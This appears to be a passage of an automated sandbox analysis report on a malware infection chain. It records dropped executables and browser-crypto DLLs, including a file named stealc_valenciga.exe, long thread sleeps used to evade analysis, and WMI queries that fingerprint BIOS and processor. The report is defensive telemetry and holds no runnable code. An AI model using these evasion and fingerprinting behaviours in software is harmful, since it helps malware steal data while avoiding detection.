Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 570
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 7346
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Window / User API: threadDelayed 9802

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1006343001\goldddd123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\hmUaBuJ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1022819001\hmUaBuJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1023286001\5f4a2ffa3a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1023282001\7d66ff7c35.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1008788001\projectspecificpro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaiintain.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\legs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1023285001\fe4b3524c6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1023284001\5f7e5e6f99.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\goldddd123[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\projectspecificpro[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nnmp[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1023288001\fd096224d5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1008664001\nnmp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[5].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\am209[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe TID: 5460	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe TID: 1248	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe TID: 2716	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe TID: 6524	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 3772	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 3772	Thread sleep time: -72036s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 3872	Thread sleep count: 1190 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 3872	Thread sleep time: -2381190s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 5576	Thread sleep count: 1166 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 5576	Thread sleep time: -2333166s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 6764	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 2780	Thread sleep count: 1261 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 2780	Thread sleep time: -2523261s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 2228	Thread sleep count: 1176 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 2228	Thread sleep time: -2353176s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 4072	Thread sleep count: 1302 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 4072	Thread sleep time: -2605302s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 6020	Thread sleep count: 1284 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 6020	Thread sleep time: -2569284s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 3780	Thread sleep count: 1246 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe TID: 3780	Thread sleep time: -2493246s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692	Thread sleep count: 156 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692	Thread sleep time: -312156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696	Thread sleep count: 570 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696	Thread sleep time: -1140570s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612	Thread sleep count: 303 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612	Thread sleep time: -9090000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688	Thread sleep count: 159 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688	Thread sleep time: -318159s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680	Thread sleep count: 135 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680	Thread sleep time: -270135s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684	Thread sleep count: 95 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684	Thread sleep time: -190095s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696	Thread sleep count: 7346 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696	Thread sleep time: -14699346s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe TID: 5252	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe TID: 5252	Thread sleep time: -34965s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe TID: 5708	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe TID: 2696	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -599760s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -599641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -599526s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -599406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -599294s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -599172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -599062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -598953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -598608s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -598485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -598122s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -597890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -597563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -597438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -597310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -597188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -597063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -596949s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -596607s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -596375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -596266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -596145s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -596016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -595797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -595358s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -595249s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -594921s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -594811s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -594692s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -594575s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -594446s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -594326s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -594203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -594092s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe TID: 7500	Thread sleep time: -593969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe TID: 2752	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe TID: 7900	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe TID: 6336	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1252	Thread sleep count: 109 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1252	Thread sleep time: -218109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 432	Thread sleep count: 106 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 432	Thread sleep time: -212106s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4092	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1880	Thread sleep count: 176 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1880	Thread sleep time: -5280000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180	Thread sleep count: 94 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3180	Thread sleep time: -188094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5460	Thread sleep count: 100 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5460	Thread sleep time: -200100s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3976	Thread sleep count: 99 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3976	Thread sleep time: -198099s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6412	Thread sleep count: 115 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6412	Thread sleep time: -230115s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1880	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Code function: 3_2_6C53EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

3_2_6C53EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599760
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599526
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599406
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599294
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599172
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 599062
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598719
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598608
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598122
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597890
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597563
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597310
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597188
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596949
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596607
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596266
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596145
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 596016
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595358
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595249
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594811
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594692
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594575
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594446
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594326
